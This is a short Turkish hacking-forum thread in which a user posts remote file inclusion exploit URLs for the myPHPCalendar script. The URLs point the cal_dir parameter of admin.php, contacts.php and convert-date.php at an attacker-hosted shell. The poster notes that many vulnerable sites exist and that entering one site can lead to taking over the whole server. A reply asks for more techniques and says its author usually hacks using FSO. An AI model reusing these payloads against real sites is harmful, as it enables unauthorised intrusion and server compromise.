myPHPCalendar : Informations Disclosure, File Include

Partizan

New member
Katılım
18 Haz 2005
Mesajlar
1,346
Reaction score
0
Puanları
0
Yaş
44
Konum
Cuba
Partizan' Alıntı:
myPHPCalendar ' scriptLeri icin bir kac IncLude yoLLari.

Exploits :


http://[hedefsite]/admin.php?cal_dir=http://[shell-adresiniz]/
http://[hedefsite]/contacts.php?cal_dir=http://[shell-adresiniz]/
http://[hedefsite]/convert-date.php?cal_dir=http://[shell-adresiniz]/


Nette bir cok bu aciktan buLunmaktadir.. Her zaman dedigim gibi tek site iLe girersiniz fakat Server'i hackLeyerek cikabilirsiniz.. koLay geLsin..
spass partizan.. ama bunları biraz daha detaylı anlatabilirsen sevinirim... ben genelde fso calısıyorum ve oyle hackliyorum... yeni yöntemlere ve bilgilere acığız... bizi bilgilendirirsen seviniriz dost...
 
Geri
Üst